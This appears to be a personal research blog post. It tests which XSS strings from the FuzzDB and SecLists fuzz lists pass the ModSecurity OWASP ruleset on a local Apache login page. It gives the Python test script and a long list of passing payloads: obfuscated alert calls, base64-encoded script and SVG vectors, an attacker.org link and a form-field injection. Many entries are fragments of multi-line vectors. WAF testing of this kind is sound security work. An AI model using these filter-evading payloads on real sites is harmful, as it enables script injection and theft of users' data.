Mod_security Bypass for XSS
I wanted to do some research in the cybersecurity domain that piqued my interest. I decided to test what XSS strings in the FuzzDB and SecLists lists bypassed mod_security OWASP ruleset on a standard Apache2 web server. I used the code represented below:
#!/usr/bin/env python
"""
Test for mod_security bypass.
"""
# Standard Python libraries.
import requests
with open ( '/root/projects/fuzzdb.txt' ) as f :
content = f . read () . splitlines ()
dict = {}
for x in content :
url = 'http://127.0.0.1/login2.php'
url = url
payload = { 'username' : x , 'password' : '1' }
r = requests . post ( url , data = payload )
dict [ x ] = r . status_code
for k , v in dict . items ():
if v == 200 :
print ( k )
print ( '----------------------------------------------' )
I combined all separate XSS lists within FuzzDB as well as SecLists. I then proceeded to run these on the login parameter of a quick PHP login script I acquired for testing. As you can see from the preceding Python code, I would print out the string that received a 200 response code from the Apache2 server. This shows that the string is not being filtered by the WAF and thus not receiving a 403 Forbidden response from the server.
If there are issues with accessing my Gihub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy
Please see my Github for all code related to this project.
These are the XSS strings that were allowed to pass though the mod_security WAF:
'
----------------------------------------------
"
----------------------------------------------
& #x61;lert(1)
----------------------------------------------
& ADz & AGn & AG0 & AEf & ACA & AHM & AHI & AGO & AD0 & AGn & ACA & AG8Abg & AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ & ACAAPABi
----------------------------------------------
& amp ; #39;XSS')>
----------------------------------------------
'); alert(' XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert & lpar ; 1 & rpar ;
----------------------------------------------
alert ( 1 )
----------------------------------------------
alert \\`1\\`
----------------------------------------------
alert `1`
----------------------------------------------
http : // raw . githubusercontent . com / fuzzdb - project / fuzzdb / master / attack / xss / test . xxe
----------------------------------------------
https : // raw . githubusercontent . com / fuzzdb - project / fuzzdb / master / attack / xss / test . xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg ==
----------------------------------------------
//% 0 D % 0 A % 0 D % 0 A //
----------------------------------------------
setTimeout ( location . search . slice ( 1 ));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >
----------------------------------------------
< br >< br >< br >< br >< br >< br >< x id = x > #x
----------------------------------------------
alert `1`
----------------------------------------------
alert & lpar ; 1 & rpar ;
----------------------------------------------
alert & #x28;1)
----------------------------------------------
alert & #40;1)
----------------------------------------------
( alert )( 1 )
----------------------------------------------
a = alert , a ( 1 )
----------------------------------------------
[ 1 ] . find ( alert )
----------------------------------------------
top [ "al" + "ert" ]( 1 )
----------------------------------------------
top [ / al /. source +/ ert /. source ]( 1 )
----------------------------------------------
al \u0065rt ( 1 )
----------------------------------------------
top [ 'al \145 rt' ]( 1 )
----------------------------------------------
top [ 'al \x65 rt' ]( 1 )
----------------------------------------------
top [ 8680439. . toString ( 30 )]( 1 )
----------------------------------------------
navigator . vibrate ( 500 )
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors ()
----------------------------------------------
< head >
----------------------------------------------
@font - face { font - family : y ; src : url ( "font.svg#x" ) format ( "svg" );} body { font : 100 px "y" ;}
----------------------------------------------
</ head >
----------------------------------------------
< body > Hello </ body >
----------------------------------------------
onerror CDATA "alert(67)"
----------------------------------------------
onload CDATA "alert(2)" >
----------------------------------------------
< div id = "91" > [ A ]
----------------------------------------------
[ B ]
----------------------------------------------
[ C ]
----------------------------------------------
[ D ]
----------------------------------------------
< feImage >
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ % 2 BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg % 3 D % 3 D "/>
----------------------------------------------
</ feImage >
----------------------------------------------
* { color : gre /**/ en ! /**/ important } /* IE 6 - 9 Standards mode */
----------------------------------------------
* { background : url ( xx : x //**/ \red /* )} /* IE 6 - 7 Standards mode */
----------------------------------------------
< a id = "x" >< rect fill = "white" width = "1000" height = "1000" /></ a >
----------------------------------------------
< div id = "113" >< div id = "x" > XXX </ div >
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
< div id = "116" >< div id = "x" > x </ div >
----------------------------------------------
< xml : namespace prefix = "t" >
----------------------------------------------
< div id = "117" >< a href = "http://attacker.org" >
----------------------------------------------
< h1 > Drop me </ h1 >
----------------------------------------------
</ div >
----------------------------------------------
function makePopups (){
----------------------------------------------
for ( i = 1 ; i < 6 ; i ++ ) {
----------------------------------------------
window . open ( 'popup.html' , 'spam' + i , 'width=50,height=50' );
----------------------------------------------
}
----------------------------------------------
}
----------------------------------------------
< body >
----------------------------------------------
</ body >
----------------------------------------------
< div id = "123" >< span class = foo > Some text </ span >
----------------------------------------------
< a class = bar href = "http://www.example.org" > www . example . org </ a >
----------------------------------------------
alert ( 'foo' );
----------------------------------------------
});
----------------------------------------------
alert ( 'bar' );
----------------------------------------------
< ! ATTLIST xsl : stylesheet
----------------------------------------------
id ID #REQUIRED>]>
----------------------------------------------
</ xsl : template >
----------------------------------------------
< circle fill = "red" r = "40" ></ circle >
----------------------------------------------
Same effect with
----------------------------------------------
< math >
----------------------------------------------
< div id = "131" >< b > drag and drop one of the following strings to the drop box : </ b >
----------------------------------------------
< br />< hr />
----------------------------------------------
< label > type a , b , c , d - watch the network tab / traffic ( JS is off , latest NoScript ) </ label >
----------------------------------------------
< br >
----------------------------------------------
< input name = "secret" type = "password" >
----------------------------------------------
</ image >
----------------------------------------------
< div id = "134" >< xmp >
----------------------------------------------
<%
----------------------------------------------
</ xmp >
----------------------------------------------
x = '<%'
----------------------------------------------
alert ( 2 )
----------------------------------------------
XXX
----------------------------------------------
< eval > new ActiveXObject ( & apos ; htmlfile & apos ;) . parentWindow . alert ( 135 ) </ eval >
----------------------------------------------
< if expr = "new ActiveXObject('htmlfile').parentWindow.alert(2)" ></ if >
----------------------------------------------
</ template >
----------------------------------------------
< input name = "username" value = "admin" />
----------------------------------------------
< input name = "password" type = "password" value = "secret" />
----------------------------------------------
< input name = "injected" value = "injected" dirname = "password" />
----------------------------------------------
< input type = "submit" >
----------------------------------------------
< circle r = "400" ></ circle >
----------------------------------------------